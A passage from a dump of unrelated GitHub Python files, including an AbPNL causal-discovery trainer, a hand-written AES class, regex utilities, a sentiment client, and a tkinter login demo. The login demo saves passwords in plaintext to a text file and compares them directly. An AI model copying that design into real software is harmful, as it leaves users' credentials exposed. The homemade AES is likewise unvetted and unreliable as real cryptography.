infile=rawpath+fname\n link=outpath+pdir+'/raw/'+fname\n saltio.symlink(infile,link,clobber)\n\n #copy the product data\n if not fastmode(detmode):\n pfname=prefix+fname\n else:\n pfname=fprefix+fname\n infile = prodpath+pfname\n link = outpath+pdir+'/product/'+pfname\n if fname[0] in ['S', 'P', 'H', 'R']: \n saltio.symlink(infile,link,clobber)\n\n\n# -----------------------------------------------------------\n# main code\nif not iraf.deftask('saltobsid'):\n parfile = iraf.osfn(\"pipetools$saltobsid.par\")\n t = iraf.IrafTaskFactory(taskname=\"saltobsid\",value=parfile,function=saltobsid, pkgname='pipetools')\n","repo_name":"saltastro/pipetools","sub_path":"saltobsid.py","file_name":"saltobsid.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15110393058","text":"import requests\nimport environ\nimport re\nfrom formClass import *\n\nenv = environ.Env()\nenviron.Env.read_env()\n\ndef checkSimplePreqs(preqList):\n \"\"\"Want to see how many forms only contain courses and logic\n \"\"\"\n count_Simple = 0\n simpleList = []\n count_None = 0\n count_complicated = 0\n complicatedList = []\n for preq in preqList:\n if preq != 'None':\n # remove punctuation\n mod = re.sub(r'[^\\w\\s]', '', preq)\n mod = re.sub('[A-Z]{2,4}\\s[0-9]{2,3}.[0-9]|[A-Z]{2,4}\\s[0-9]{2,3}', '$', mod)\n rep = re.sub('[A-Z]{2,4}\\s[0-9]{2,3}.[0-9]|[A-Z]{2,4}\\s[0-9]{2,3}', '$', preq)\n # print(mod)\n acceptedRegex = '[Aa]nd|[Oo]ne|of|or|\\$'\n accept = True\n preqTokens = mod.split(' ')\n # print(preqTokens)\n for w in preqTokens:\n \n if re.search(acceptedRegex, w) == None:\n \n accept = False\n count_complicated += 1\n if preq not in complicatedList:\n print(preq)\n complicatedList.append(preq)\n break\n\n if accept:\n \n if rep not in simpleList:\n simpleList.append(rep)\n count_Simple += 1\n else:\n count_None += 1\n \n print(f'None Count: {count_None}\\nSimple Count: {count_Simple}, Unique: {len(simpleList)}\\nComplicated Count: {count_complicated}, Unique: {len(complicatedList)}')\n returnDict = {'counts': [count_None, count_Simple, count_complicated],\n 'lists': [['None'], simpleList, complicatedList]}\n return returnDict\n\n\n\ndef checkImplicit(preqList):\n \"\"\"Perform a check to see how many (and which) prerequisite forms still contain\n 3-digit numbers that are unnassociated with a course code. 
Tests Form.formalizeCourseNames\n param: p: a list of prerequisite strings\n \n Note, March 30th inspection yielded 9 strings remaining, all of which made sense\n \"\"\"\n count = 0\n for preq in preqList:\n form1 = Form(preq)\n mod = form1.formalizeCourseNames()\n \n # Want to see which implicit courses we may have missed\n # Ignore things like 200-level (which there are many)\n mod = re.sub('[0-9]{3}.(l|L)evel|', '', mod)\n # find numbers\n r2 = '(?> i) & 0X01) * tmp[i])\r\n\r\n return tmp_mul\r\n\r\n # Reference: https://blog.csdn.net/bupt073114/article/details/27382533\r\n @staticmethod\r\n def __x_time(x):\r\n return Encryption.__to_8bit((x << 1) ^ (0X1B if x & 0X80 else 0X00))\r\n\r\n @staticmethod\r\n def __to_8bit(x):\r\n return int(bin(x)[2:][-8:], 2)\r\n\r\n @staticmethod\r\n def __key_generation(key_bytes):\r\n\r\n key_words = [key_bytes[i:i + 4] for i in range(4)]\r\n\r\n for i in range(4, 44):\r\n tmp = b\"\"\r\n if i % 4 == 0:\r\n g_w = Encryption.__g_fun(key_words[i - 1], i // 4)\r\n else:\r\n g_w = key_words[i - 1]\r\n for j in range(4):\r\n tmp += (key_words[i - 4][j] ^ g_w[j]).to_bytes(1, sys.byteorder)\r\n key_words.append(tmp)\r\n\r\n keys = [reduce(add, key_words[i:i + 4]) for i in range(0, 11)]\r\n\r\n return keys\r\n\r\n @staticmethod\r\n def __g_fun(word, key_num):\r\n new_word = word[1:] + word[:1]\r\n result = b\"\"\r\n for index, b in enumerate(new_word):\r\n result += (Encryption.S_table[b] ^ (Encryption.RC[key_num]\r\n if index == 0 else 0X00)).to_bytes(1, sys.byteorder)\r\n\r\n return result\r\n\r\n @staticmethod\r\n def __remove_PKCS_7_padding(x):\r\n remove_num = x[-1]\r\n return x[:-remove_num]\r\n","repo_name":"EnigmaZhang/MyAES","sub_path":"Encryption.py","file_name":"Encryption.py","file_ext":"py","file_size_in_byte":13478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17123158657","text":"#get possible domain names\n\n# Complete the getPotentialDomains function below.\nimport re\ndef getPotentialDomains(lines):\n pattern = '(http|https)\\\\://(www.|ww2.|)([a-zA-Z0-9\\\\-\\\\.]+)(\\\\.[a-zA-Z]+)(/\\\\S*)?'\n\n regex = re.compile(pattern)\n s = set()\n for i in range(len(lines)):\n for string in lines:\n iterator = regex.finditer(string)\n if iterator:\n for match in iterator:\n s.add((match.group(3) + match.group(4)).replace('web.', ''))\n return (';'.join(t for t in sorted(s)))\n","repo_name":"SatyaChipp/_Hackerrank","sub_path":"Millenium/detect_domain_name.py","file_name":"detect_domain_name.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21436371975","text":"from __future__ import annotations\n\nfrom collections import defaultdict\nfrom copy import deepcopy\nimport os\nimport sys\nfrom typing import Any, TypeVar, cast\nfrom collections.abc import Sequence, Callable\nimport random as py_random\nfrom concurrent.futures import Future, ProcessPoolExecutor\n\nimport numpy as np\nfrom numpy.typing import NDArray\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Optimizer\nimport torch.nn.functional as F\nfrom torch.optim import Adam\n\nfrom abpnl import AbPNLModel, NtoOneDataset\nimport stats\n\n# T = TypeVar('T', bound=np.generic, covariant=True)\nT = TypeVar('T', bound=np.floating[Any])\nSEP = os.path.sep\n\n\ndef pp(*args: Any, **kwargs: Any) -> None:\n print(*args, **kwargs)\n sys.stdout.flush()\n\n\nclass LogItems(defaultdict[int, dict[str, Any]]):\n 
def seq(self, key: str) -> list[tuple[int, Any]]:\n return [\n (_, self[_][key]) for _ in sorted(self.keys()) if key in self[_]\n ]\n\n\ndef to_csv(\n log: dict[int, dict[str, Any]], sep: str = \",\", lastln: bool = True\n ) -> str:\n \"\"\"\n Convert logs to csv-formatted string.\n\n Parameters\n ----\n log : dict\n key=iteration, value=dict(str, numeric)\n sep : str\n delimiter string\n \"\"\"\n columns_ = set()\n for _, l in log.items():\n for c in l.keys():\n if c not in columns_:\n columns_.add(c)\n columns = sorted(list(columns_))\n\n s = [sep.join([\"idx\", ] + columns), ]\n for i, l in log.items():\n s.append(\n sep.join([str(i), ] + [str(l.get(_, \"\")) for _ in columns])\n )\n return \"\\n\".join(s) + (\"\\n\" if lastln else \"\")\n\n\nclass AbPNLTrainer(object):\n def __init__(self, params: dict[str, Any]):\n super().__init__()\n self._params = params\n self._causal_order: list[int] = []\n self._adjacency_matrix: NDArray[Any]\n\n def _check_params(self) -> None:\n keys = {\n \"logdir\": \"str. A path of log directory.\",\n \"max_workers\": \"int. The number of parallel execution.\",\n \"n_trials\": \"int, The number of trials for one model learning.\",\n \"pruning_threshold\":\n \"float. Threshold of p-value used for pruning.\",\n \"n_epoch\": \"int. The number of learning epoch.\",\n \"n_units\": \"int. The number of units in a layer of MLPs.\",\n \"n_layers\": \"int. The number of layers in MPLs.\",\n \"activation\": \"Callable. The activation function.\",\n \"loss_balance\":\n \"float. Relative weight of loss_ind against loss_inv.\",\n \"batchsize\": \"int. Batchsize.\",\n \"dropout\": \"bool. Use dropout.\",\n \"optimizer\": \"Callable. Optimizer.\",\n \"learning_rate\": \"float. Learning rate for the optimizer.\",\n \"interval_test\": \"int. The interval of epochs at which to test\",\n \"interval_save\":\n \"int. 
The interval of epochs at which to save the model.\"\n }\n for k, v in keys.items():\n if k not in self._params:\n raise ValueError(f\"`{k}` ({v}) not in params.\")\n\n def doit(\n self,\n x_train: Sequence[Sequence[T]] | NDArray[T],\n x_test: Sequence[Sequence[T]] | NDArray[T]\n ) -> None:\n \"\"\"\n\n Parameters\n ----------\n x_train : Sequence[Sequence[T]]\n Training samples with shape=(#samples, #variables).\n x_test : Sequence[Sequence[T]]\n Test samples with shape=(#samples, #variables).\n \"\"\"\n self._x_train = cast(Sequence[Sequence[T]], x_train)\n self._x_test = cast(Sequence[Sequence[T]], x_test)\n self._variables = list(range(len(x_train[0])))\n\n os.makedirs(self._params[\"logdir\"], exist_ok=True)\n while len(self._variables) > 1:\n self._find_sink()\n top = self._variables[0]\n self._causal_order.append(top)\n # self._prune()\n\n def _find_sink(self) -> None:\n logs = self._train_all_ntoone_parallel()\n sink = self._select_var(logs, \"loss/test\",\n \"loss_ind/test\", np.median)[0]\n\n self._variables = [_ for _ in self._variables if _ != sink]\n self._causal_order.append(sink)\n pp(\"causal order:\", self._causal_order)\n\n # logging\n pstfx = \"_\".join(f\"{_}\" for _ in self._variables)\n # selected models\n logfn = self._params[\"logdir\"] + f\"{SEP}models_{pstfx}.csv\"\n csv = to_csv({_i: _d for _i, _d in enumerate(self._log_models)})\n with open(logfn, \"w\") as f:\n f.write(csv)\n # stats\n logfn = self._params[\"logdir\"] + f\"{SEP}stats_{pstfx}.csv\"\n csv = \"\\n\".join(\n \",\".join(f\"{_}\" for _ in _l) for _l in self._log_stats\n ) + \"\\n\"\n with open(logfn, \"w\") as f:\n f.write(csv)\n\n def _train_all_ntoone_parallel(self) -> dict[int, list[LogItems]]:\n \"\"\" Train all the possible n-to-one pnl models. \"\"\"\n futures: list[tuple[int, int, Future[LogItems]]] = []\n with ProcessPoolExecutor(\n max_workers=self._params[\"max_workers\"]) as executor:\n for effect in self._variables:\n causes = [_ for _ in self._variables if _ != effect]\n ds_train = NtoOneDataset(self._x_train, causes, effect)\n ds_test = NtoOneDataset(self._x_test, causes, effect)\n parent_logdir = \"cause\" + \"_\".join(str(_) for _ in causes) + \\\n f\"effect{effect}\"\n for t in range(self._params[\"n_trials\"]):\n logdir = f\"{parent_logdir}{SEP}trial{t}\"\n self._params[\"l_logdir\"] = \\\n self._params[\"logdir\"] + SEP + logdir\n self._params[\"l_seed\"] = np.random.randint(1000000)\n params = deepcopy(self._params)\n if not os.path.exists(params[\"l_logdir\"]):\n os.makedirs(params[\"l_logdir\"])\n\n future = executor.submit(train, ds_train, ds_test, params)\n futures.append((effect, t, future))\n results = [(_[0], _[1], _[2].result()) for _ in futures] # Wait.\n\n all_logs: dict[int, list[LogItems | None]] = {\n _: [None]*self._params[\"n_trials\"] for _ in self._variables\n }\n for effect, t, log in results:\n all_logs[effect][t] = log\n return cast(dict[int, list[LogItems]], all_logs)\n\n def _select_var(\n self,\n logs: dict[int, list[LogItems]],\n key_model: str = \"loss/test\",\n key_stats: str = \"loss_ind/test\",\n f_stats: Callable[[list[float]], float] = np.median\n ) -> tuple[int, float]:\n \"\"\"Select an index with the minimum criterion calculated over trials.\n\n Parameters\n ----------\n logs : dict[int, list[LogItems]]\n All LogItems.\n key_model : str, optional\n Key to select a model in one trial, by default \"loss/test\"\n key_stats : str, optional\n Key to calculate stats over trials, by default \"loss_ind/test\"\n f_stats : Callable[[list[Any]], Any], 
optional\n Stats function over trials, by default np.median\n\n Returns\n -------\n int\n Index that achieved the minimum stats value.\n Any\n Its value.\n \"\"\"\n models: list[dict[str, Any]] = []\n measures: list[tuple[int, float]] = []\n for e, log_e in logs.items():\n measures_t = []\n for t, log in enumerate(log_e):\n i = self._select_model(log, key_model)\n record = log[i] # Log record of the selected model.\n\n # AbPNL sometimes fails to reconstruct the effect, y'.\n # Remove such trials from calculating stats of the model.\n # In such trials, y' becomes a constant, thus MSE~var(y).\n rec_ok = \\\n record[\"loss_inv/test\"] < .5 * record[\"y_stats/variance\"]\n if rec_ok:\n measures_t.append(record[key_stats])\n model = {\n \"__condition\": e, \"_trial\": t, \"_reconstruct\": rec_ok\n }\n model.update(record)\n models.append(model)\n measures.append((\n e, f_stats(measures_t) if len(measures_t) > 0 else float(\"inf\")\n ))\n self._log_models = models\n self._log_stats = measures\n k = np.argmin([_[1] for _ in measures])\n return measures[k]\n\n def _select_model(self, log: LogItems, key: str = \"loss/test\") -> int:\n return min(log.seq(key), key=lambda _: cast(float, _[1]))[0]\n\n def _prune(self) -> None:\n p = len(self._causal_order)\n parents = {\n self._causal_order[_]: self._causal_order[_+1:] for _ in range(p)\n }\n pruning_finished = {_: False for _ in self._causal_order}\n pruning_finished[self._causal_order[-1]] = True\n\n while not np.all(list(pruning_finished.values())):\n with ProcessPoolExecutor(\n max_workers=self._params[\"max_workers\"]) as executor:\n futures: list[tuple[int, int, list[int],\n int, Future[LogItems]]] = []\n for i, parents_i in parents.items():\n fin_i = pruning_finished[i]\n if not fin_i:\n for exclude_parent in parents_i:\n parents_i_new = [\n _ for _ in parents_i if _ != exclude_parent]\n\n if len(parents_i_new) > 0:\n logdir_prfx = \\\n f\"pruning{SEP}cause{i}effect\" + \\\n \"_\".join(str(_) for _ in parents_i_new) + \\\n f\"remove{exclude_parent}\"\n for t in range(self._params[\"n_trials\"]):\n logdir = self._params[\"logdir\"] + \\\n f\"{SEP}{logdir_prfx}{SEP}trial{t}\"\n seed = np.random.randint(1000000)\n\n self._params[\"l_logdir\"] = logdir\n self._params[\"l_seed\"] = seed\n params = deepcopy(self._params)\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n\n future = executor.submit(\n evaluate_prune,\n self._x_train, self._x_test,\n i, parents_i_new, exclude_parent,\n params, t\n )\n futures.append((i, exclude_parent,\n parents_i_new, t, future))\n else:\n logdir = \\\n self._params[\"logdir\"] + \\\n f\"{SEP}pruning{SEP}\" + \\\n f\"cause{i}remove{exclude_parent}\"\n self._params[\"l_logdir\"] = logdir\n params = deepcopy(self._params)\n t = 0\n future = executor.submit(\n evaluate_prune,\n self._x_train, self._x_test,\n i, parents_i_new, exclude_parent,\n params, t\n )\n futures.append((i, exclude_parent,\n parents_i_new, t, future))\n results = {\n (_[0], _[1], _[3]): (_[2], _[4].result()) for _ in futures\n } # {(child, excluded_parent, trial):(parents, results)}\n\n prune_logs: dict[int, dict[int, list[LogItems | None]]]\n prune_logs = defaultdict(dict)\n for (i, j, t), (pa, log) in results.items():\n if j not in prune_logs[i]:\n if len(pa) > 0:\n prune_logs[i][j] = [None, ] * self._params[\"n_trials\"]\n else:\n prune_logs[i][j] = [None, ]\n prune_logs[i][j][t] = log\n for i, prune_log in prune_logs.items():\n j, p_val = self._select_var(\n cast(dict[int, list[LogItems]], prune_log),\n \"loss/test\", \"comp/hsic/p\", 
np.min)\n\n # logging start\n pstfx = \"cause\" + \"_\".join(f\"{_}\" for _ in parents[i]) + \\\n f\"effect{i}\"\n # selected models\n logfn = self._params[\"logdir\"] + \\\n f\"{SEP}pruning{SEP}models_{pstfx}.csv\"\n csv = to_csv({\n _i: _d for _i, _d in enumerate(self._log_models)\n })\n with open(logfn, \"w\") as f:\n f.write(csv)\n # stats\n csv = \"\\n\".join(\n \",\".join(f\"{_}\" for _ in _l) for _l in self._log_stats\n ) + \"\\n\"\n logfn = self._params[\"logdir\"] + \\\n f\"{SEP}pruning{SEP}measures_{pstfx}.csv\"\n with open(logfn, \"w\") as f:\n f.write(csv)\n # logging end\n\n threshold = self._params[\"pruning_threshold\"]\n if p_val < threshold:\n parents[i] = [_ for _ in parents[i] if _ != j]\n if len(parents[i]) == 0:\n pruning_finished[i] = True\n else:\n pruning_finished[i] = True\n adjacency_matrix = np.zeros((p, p), dtype=int)\n for i, parents_i in parents.items():\n for j in parents_i:\n adjacency_matrix[i, j] = 1\n self._adjacency_matrix = adjacency_matrix\n\n @property\n def causal_order(self) -> list[int]:\n return self._causal_order\n\n @property\n def adjacency_matrix(self) -> NDArray[T]:\n return self._adjacency_matrix\n\n default_params = {\n \"logdir\": \"abpnl_results\",\n \"max_workers\": 1,\n \"n_trials\": 9,\n \"pruning_threshold\": 0.95,\n \"n_epoch\": 100,\n \"n_units\": 5,\n \"n_layers\": 3,\n \"activation\": F.leaky_relu,\n \"loss_balance\": 0.5,\n \"batchsize\": 64,\n \"dropout\": True,\n \"optimizer\": Adam,\n \"learning_rate\": 1e-3,\n \"interval_test\": 1,\n \"interval_save\": -1,\n }\n\n\ndef train(\n x_train: NtoOneDataset[T], x_test: NtoOneDataset[T],\n params: dict[str, Any],\n noise_stats_samples: NDArray[T] | None = None\n ) -> LogItems:\n seed = params[\"l_seed\"]\n np.random.seed(seed)\n torch.manual_seed(seed)\n py_random.seed(seed)\n\n pp(params[\"l_logdir\"])\n\n train_loader = DataLoader(x_train, batch_size=params[\"batchsize\"],\n shuffle=True)\n test_loader = DataLoader(x_test, batch_size=len(x_test))\n\n model = AbPNLModel(\n nx=len(x_train.causes), ny=1,\n nz=params[\"n_units\"], nl=params[\"n_layers\"],\n actf=params[\"activation\"], a=params[\"loss_balance\"],\n )\n opt = cast(\n Optimizer,\n params[\"optimizer\"](model.parameters(), params[\"learning_rate\"])\n )\n log_items = LogItems(dict)\n\n iteration = -1\n for epoch in range(params[\"n_epoch\"]):\n for x, y in train_loader:\n iteration += 1\n\n opt.zero_grad()\n loss = model(x, y)\n loss.backward()\n opt.step()\n\n log_items[iteration].update({\n \"epoch\": epoch, \"iteration\": iteration,\n \"loss/train\": model.loss,\n \"loss_ind/train\": model.loss_ind,\n \"loss_inv/train\": model.loss_inv,\n })\n\n if (epoch+1) % params[\"interval_test\"] == 0:\n x, y = next(iter(test_loader)) # Get all the test samples.\n model.train(False)\n with torch.no_grad():\n loss = model(x, y)\n model.train(True)\n\n log_items[iteration].update({\n \"loss/test\": model.loss,\n \"loss_ind/test\": model.loss_ind,\n \"loss_inv/test\": model.loss_inv,\n })\n\n # Will be used for checking reconstruction failure.\n arr_y = y.detach().numpy()\n log_items[iteration].update({\n \"y_stats/mean\": arr_y.mean(),\n \"y_stats/variance\": arr_y.var(),\n })\n\n if noise_stats_samples is not None:\n z = stats.standardize(noise_stats_samples)\n e = stats.standardize(model.e)\n p_val = stats.calc_HSIC_p(z, e)\n log_items[iteration].update({\n \"comp/hsic/p\": p_val\n })\n\n if (params[\"interval_save\"] > 0) and \\\n ((epoch+1) % params[\"interval_save\"] == 0):\n torch.save(\n model.state_dict(),\n 
params[\"l_logdir\"]\n + f\"{SEP}model_iter{iteration}\"\n )\n\n torch.save(\n model.state_dict(),\n params[\"l_logdir\"] + f\"{SEP}model_final\")\n\n csv = to_csv(log_items)\n with open(params[\"l_logdir\"] + f\"{SEP}log.csv\", \"w\") as f:\n f.write(csv)\n\n return log_items\n\n\ndef evaluate_prune(\n x_train: Sequence[Sequence[T]], x_test: Sequence[Sequence[T]],\n child: int, parents: list[int],\n excluded_parent: int, params: dict[str, Any], t: int\n ) -> LogItems:\n if len(parents) > 0:\n ds_train = NtoOneDataset(x_train, parents, child)\n ds_test = NtoOneDataset(x_test, parents, child)\n z = np.array(x_test)[:, excluded_parent]\n\n logs = train(ds_train, ds_test, params, z)\n else:\n x = np.array(x_test)[:, excluded_parent]\n y = np.array(x_test)[:, child]\n\n p_val = stats.calc_HSIC_p(stats.standardize(x), stats.standardize(y))\n logs = LogItems(dict)\n logs[0].update({\n \"comp/hsic/p\": p_val\n })\n # Dummy\n logs[0].update({\n \"loss/test\": 0.0,\n \"loss_inv/test\": 0.0,\n \"y_stats/variance\": 1.0,\n })\n\n os.makedirs(params[\"l_logdir\"], exist_ok=True)\n csv = to_csv(logs)\n with open(params[\"l_logdir\"] + f\"{SEP}log.csv\", \"w\") as f:\n f.write(csv)\n\n return logs\n","repo_name":"grigor97/abpnl","sub_path":"abpnl/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":18875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"21502874087","text":"# Login System\n\n# File \nperson = {} #\nwith open(\"Login.txt\",\"r+\") as file:\n for line in file:\n splitline = line.split()\n person[splitline[0]] = ','.join(splitline[1:]) # !!\n\n\nimport tkinter # GUI : Graphical User Interface\nimport tkinter.messagebox\n\ndef Sign_up(): # Sign up (Kaydol)\n \n nm = theEntry1.get() # Name\n #nm = nm.title() # first letter is capital\n ps = theEntry2.get() # Password\n \n A = ''\n if nm.count(' ') > 0: # This code diversify -> Hello_world \n for i in nm:\n if i == ' ':\n i = '_'\n A += i\n nm = A\n A = ''\n if ps.count(' ') > 0: # This code diversify -> Hello_world \n for i in ps:\n if i == ' ':\n i = '_'\n A += i\n ps = A\n \n \n if nm in person: \n tkinter.messagebox.showerror(\"Error\",\"Another user have this username\")\n \n elif person.keys() != nm: \n person[nm] = ps \n with open(\"Login.txt\",\"a\") as file:\n file.writelines(f\" {nm} \")\n \n with open(\"Login.txt\",\"a\") as file:\n file.writelines(f\" {ps} \\n\")\n \n\ndef Sign_in(): # Sign in (Oturum aç)\n \n nm = theEntry1.get() # Name\n #nm = nm.title() # first letter is capital\n ps = theEntry2.get() # Password\n \n A = ''\n if nm.count(' ') > 0: # This code diversify -> Hello_world \n for i in nm:\n if i == ' ':\n i = '_'\n A += i\n nm = A\n if ps.count(' ') > 0: # This code diversify -> Hello_world \n for i in ps:\n if i == ' ':\n i = '_'\n A += i\n ps = A\n \n if nm in person.keys():\n if person[nm] == ps:\n tkinter.messagebox.showinfo(\"Log in message\",\"Access is success\")\n else:\n tkinter.messagebox.showerror(\"Log in message\",\"Access denied\")\n else:\n tkinter.messagebox.showerror(\"Log in message\",\"Access denied\")\n \n\n\nroot = tkinter.Tk() # Basic window\n\nroot.configure(background=\"white\")\nroot.iconbitmap(\"C:/Users/Dell/Desktop/GitHub/Python/Basic_PythonExamples/Login System/person.ico\")\nroot.title(\"Login System\")\nroot.minsize(width=500,height=300)\nroot.resizable(width=False,height=False)\n\n# Username\nUser = tkinter.Label(root,font=\"arial 14\",fg=\"red\",text=\"Username : 
\",bg=\"white\")\nUser.place(x=100,y=20,width=100,height=30)\n# x and y coordinates\n\ntheEntry1 = tkinter.Entry(root,font=\"arial 14\",fg=\"black\",bd=2)\ntheEntry1.place(x=220,y=20,width=200,height=30)\n\n# Password\nPass = tkinter.Label(root,font=\"arial 14\",fg=\"red\",text=\"Password : \",bg=\"white\")\nPass.place(x=100,y=60,width=100,height=30)\n# x and y coordinates\n\ntheEntry2 = tkinter.Entry(root,font=\"arial 14\",fg=\"black\",bd=2,show=\"*\")\ntheEntry2.place(x=220,y=60,width=200,height=30)\n\n# Sign in Button\nLog = tkinter.Button(root,font=\"arial 14\",fg=\"white\",text=\"Sign in\",bd=0,bg=\"#64c4ed\",command=Sign_in)\nLog.place(x=220,y=100,width=200,height=30)\n\n# Sign up Button\nLog = tkinter.Button(root,font=\"arial 14\",fg=\"white\",text=\"Sign up\",bd=0,bg=\"#64c4ed\",command=Sign_up)\nLog.place(x=220,y=140,width=200,height=30)\n\nroot.mainloop()","repo_name":"YunusEmreAlps/Python_Examples","sub_path":"Login System/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40039830932","text":"import abc\nimport json\nimport sys\n\nfrom monkeylearn import MonkeyLearn\n\n\nclass BaseClient(abc.ABC):\n def __init__(self, config_obj):\n self.count = 0\n self.data = []\n self.config = config_obj\n\n @abc.abstractmethod\n def fetch_sentiments(self, keyword, data_file_path):\n pass\n\n\nclass MonkeyLearnClient(BaseClient):\n def __init__(self, config_obj):\n super().__init__(config_obj)\n self.model_id = self.config.MONKEYLEARN_MODEL_ID\n self.client = MonkeyLearn(self.config.MONKEYLEARN_API_TOKEN)\n\n def _load_data(self, data_file_path):\n with open(data_file_path, \"r\") as fp:\n for line in fp.readlines():\n try:\n data = line.strip()\n self.data.append(data)\n except json.decoder.JSONDecodeError:\n print(f\"Failing {data}\", file=sys.stderr)\n\n def fetch_sentiments(self, keyword, data_file_path):\n self._load_data(data_file_path)\n\n if self.config.FLASK_ENV == \"production\":\n response = self.client.classifiers.classify(\n model_id=self.model_id,\n data=self.data,\n auto_batch=True,\n retry_if_throttled=True,\n )\n\n return response.body\n return [\n {\n \"text\": \"This is a great tool!\",\n \"external_id\": None,\n \"error\": False,\n \"classifications\": [\n {\n \"tag_name\": \"Positive\",\n \"tag_id\": 33767179,\n \"confidence\": 0.998,\n }\n ],\n },\n {\n \"text\": \"This is a great tool!\",\n \"external_id\": None,\n \"error\": False,\n \"classifications\": [\n {\n \"tag_name\": \"Positive\",\n \"tag_id\": 33767179,\n \"confidence\": 0.998,\n }\n ],\n },\n ]\n\n\nclient_map = {\"monkeylearn\": MonkeyLearnClient}\n","repo_name":"court-room/rinnegan-flask","sub_path":"lib/rinnegan_worker/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37060131387","text":"import numpy as np\nimport torch\nimport train\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom copy import deepcopy\n\ndef test_with_dataloader(model, test_loader, weight=None):\n all_score = []\n all_gt = []\n all_frame = []\n all_name = []\n model.eval()\n for i, data in enumerate(test_loader):\n inputs, gts, frames, names = data\n inputs = inputs.view(-1, inputs.size(-1)).to(torch.device('cuda'))\n pred = model(inputs, vars=weight)\n all_score.append(pred.cpu().detach().numpy())\n all_gt += gts\n all_frame += frames\n all_name += names\n 
model.train()\n num_video = len(all_frame)\n all_score = np.concatenate(all_score).reshape(num_video, -1)\n return all_score, all_gt, all_frame, all_name\n\n\ndef get_auc(score_by_frame, gt_by_frame):\n idx = np.argsort(-score_by_frame)\n tp = gt_by_frame[idx] > 0\n fp = gt_by_frame[idx] == 0\n\n cumsum_tp = np.cumsum(tp)\n cumsum_fp = np.cumsum(fp)\n\n nrpos = np.sum(gt_by_frame)\n rec = cumsum_tp / nrpos\n fpr = cumsum_fp / np.sum(gt_by_frame == 0)\n\n auc = np.trapz(rec, fpr)\n return auc\n\n\ndef get_fpr(score_by_frame, gt_by_frame, threshold=0.5):\n pred = (score_by_frame > threshold).astype(int)\n n_neg = np.sum(gt_by_frame==0)\n fp = ((pred == 1).astype(int) * (pred != gt_by_frame).astype(int)).sum()\n return fp/n_neg\n\n\ndef seg2frame(actual_frames, score, gt, fixed_len=True):\n detection_score_per_frame = np.zeros(actual_frames)\n if not fixed_len:\n for i in range((actual_frames-1)//16+1):\n detection_score_per_frame[i*16:(i+1)*16] = score[i]\n else:\n thirty2_shots = np.round(np.linspace(0, actual_frames//16, 33))\n for i in range(len(thirty2_shots)-1):\n ss = int(thirty2_shots[i])\n ee = int(thirty2_shots[i+1])-1\n\n if ee M_s or M_g (For M_g, we manually find best model\n by collecting outputs of different experiments)\n 2. if is_sampling == False\n 2.1 if args.chpt is None --> S (Scratch)\n 2.2 else --> P (Pretrain)\n '''\n if sampling:\n # Meta-model test code\n # Select best model sampled every 300 epochs\n start_epoch, end_epoch = 0, 3000\n epoch_step = 300\n best_epoch, best_auc = -1, -1\n for i in range(start_epoch, end_epoch + 1, epoch_step):\n if args.chpt is not None:\n # Name of chpt file is like '{}epochs_exp1_seed1_lr0.001_split1.pkl'\n model_path = os.path.join('meta_model', args.chpt.format(i))\n model.load_state_dict(torch.load(model_path))\n auc, _ = eval_with_cv(model, ft_loader, cv_loader_list, eval_loader, criterion, args)\n print(auc)\n if auc > best_auc:\n best_auc = auc\n best_epoch = i\n print(\"Best AUC: {} at {} meta-iters\".format(best_auc, best_epoch))\n else:\n # Pretrain (baseline) test code\n if args.chpt is not None:\n model_path = os.path.join('pretrain', args.chpt)\n model.load_state_dict(torch.load(model_path))\n\n auc, best_epoch = eval_with_cv(model, ft_loader, cv_loader_list, eval_loader, criterion, args)\n print(\"Best AUC: {} \".format(auc))\n\n","repo_name":"junha-kim/Learning-to-Adapt-to-Unseen-Abnormal-Activities","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"25479006084","text":"import torch\nimport os\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nimport argparse\nfrom os.path import join, split\nimport shutil\nfrom data_fashion import test_set, val_set, train_set, train_sampler, val_sampler\nfrom model import Class_Net, Class_Net96\n# import sys\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef mkdir(path):\n\tfolder = os.path.exists(path)\n\tif not folder: \n\t\tos.makedirs(path)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='cs194 proj4')\n 
parser.add_argument('--batch-size', type=int, default=64,\n help='input batch size for training (default: 64)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\n parser.add_argument('--workers', type=int, default=8)\n parser.add_argument('--freq', default=10, type=int)\n parser.add_argument('--cp_dir', default='./')\n parser.add_argument('--log', default='./') \n\n args = parser.parse_args()\n return args\n\ndef accuracy(output, target):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n _, pred = output.max(1)\n pred = 